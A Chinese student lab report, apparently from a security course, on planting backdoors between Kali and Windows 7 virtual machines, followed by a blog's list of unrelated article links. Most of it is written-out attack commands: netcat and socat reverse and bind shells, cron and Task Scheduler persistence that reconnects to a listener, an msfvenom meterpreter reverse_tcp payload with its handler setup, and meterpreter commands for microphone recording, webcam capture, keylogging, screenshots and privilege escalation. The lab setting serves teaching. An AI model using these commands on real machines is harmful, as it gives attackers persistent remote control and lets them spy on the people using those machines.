基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?
下载破解游戏,盗版电影或安装来历不明的软件,可能被留下后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win环境下可以开机自动启动,linux环境可以用corn启动。
(3)Meterpreter有哪些给你映像深刻的功能?
可以自己定制后门程序,针对不同用户不同主机不同人群。
(4)如何发现自己有系统有没有被安装后门?
杀毒软件报错,开启防火墙等防护措施。

任务一

使用ipconfig查询win7的IP地址

进入ncat文件夹中,使用命令ncat.exe -l -p 5337监听本机的5337端口
在kali环境中使用netcat命令连接到Windows主机,使用netcat 命令netcat 192.168.1.101 5337 -e /bin/sh进行连接

即可获取kali权限

任务二

使用ifconfig查看kali的IP地址

使用nc -l -p 5337指令监听5337端口

在Windows下,使用ncat.exe -e cmd.exe 192.168.1.154 5337反向连接kali的5337端口
在kali下可以看到已经获得Windows权限Microsoft Windows,可以输入命令进行操作

任务三

首先在Windows下监听5337端口ncat.exe -l 5337

从kali使用netcat 192.168.1.101 5337命令连接到Windows端口

建立连接后可以进行数据传输

任务四

在Windows系统下,使用ncat.exe -l -p 5337监听5337端口

在kali中,使用crontab -e指令编辑一条定时任务,输入指令后选3进入crontab编辑界面

在最后一行添加07 * * * * /bin/netcat 192.168.1.101 5337 -e /bin/sh,在每个小时的第07分反向连接Windows主机的5337端口,然后保存退出

因为做的时候是20:05 于是我设定07启动

任务五

在win7右键我的电脑,点击管理,在任务计划程序中点击创建任务,填写任务名字并编辑触发器。

点击操作选择启动程序程序或脚本填写你自己的socat.exe程序的路径,在添加参数中填写tcp-listen:5337 exec:cmd.exe,pty,stderr

创建完成之后锁定计算机再重新启动发现程序已经在运行了

在kali虚拟机中输入socat - tcp:192.168.1.101:5337可以发现已经成功获得了一个cmd shell

任务六

在kali上执行命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5337 -f exe > 20165337_backdoor.exe这里的IP地址填写kali的IP地址,生成后门程序20165337_backdoor.exe

在Windows下进入ncat文件夹输入命令ncat.exe -lv 5337 > 20165337_backdoor.exe,被控主机就进入了文件接收模式

在kali中输入nc 192.168.1.101 5337 < 20165337_backdoor.exe,这里的IP为win7的IP,进行后门文件的传输

传输完成

在Kali上使用命令msfconsole进入msf控制台

输入:
use exploit/multi/handler使用监听模块,
set payload windows/meterpreter/reverse_tcp设置payload
set LHOST 192.168.1.154设置反弹回连的IP和端口,这里用的是kali的IP
set LPORT 5337设置反弹回连的IP和端口

输入show options

exploit使用监听

运行Win7的后门程序

kali已经获取权限

任务七

在任务六的基础上进行
使用record_mic指令截获一段音频,用-d选项设置录制时间

使用webcam_snap指令可以使用摄像头进行拍照
但是win7不能调用摄像头,会出现以下界面

使用keyscan_start开始记录下敲键的过程,使用keyscan_dump指令读取敲键的记录

使用screenshot命令进行截屏

使用命令getuid查看当前用户,使用getsystem命令提权

最新文章

  1. Nginx配置文件nginx.conf中文详解
  2. centos 清理内存缓存
  3. Web API应用架构设计分析(1)
  4. BestCoder22 1003.NPY and shot 解题报告
  5. Go的基本示例
  6. [JavaScript]函数调用作用域的一些问题
  7. FIO使用指南
  8. ContentProvider官方教程(2)简介、Content URIs
  9. HDU 5862(离散化+树状数组)
  10. 智传播客hadoop视频学习笔记(共2天)
  11. YUV422蓝屏显示输出功能辅助调试
  12. 软件测试-nextDate问题
  13. 终极锁实战:单JVM锁+分布式锁
  14. python的计数引用分析(一)
  15. springmvc入门程序
  16. Mac上安装Docker
  17. eclipse Android项目 DDMS db文件 导出 Failed to pull selection null 问题
  18. JS常用类
  19. useful tips for python
  20. bootstrap 文本对齐风格

热门文章

  1. Scala--控制结构和函数
  2. Login Verification CodeForces - 928A (实现)
  3. No repeats please 全排列
  4. 算法01 C语言设计
  5. MySQL之执行流程
  6. Asp.Net Core Options模式的知识总结
  7. Animate与transform的使用
  8. Tomcat启动报错,报找不到gdk_custom.jar
  9. input密码框输入后设置显示为星号或其他样式
  10. Matlab 中subsystem mask封装子系统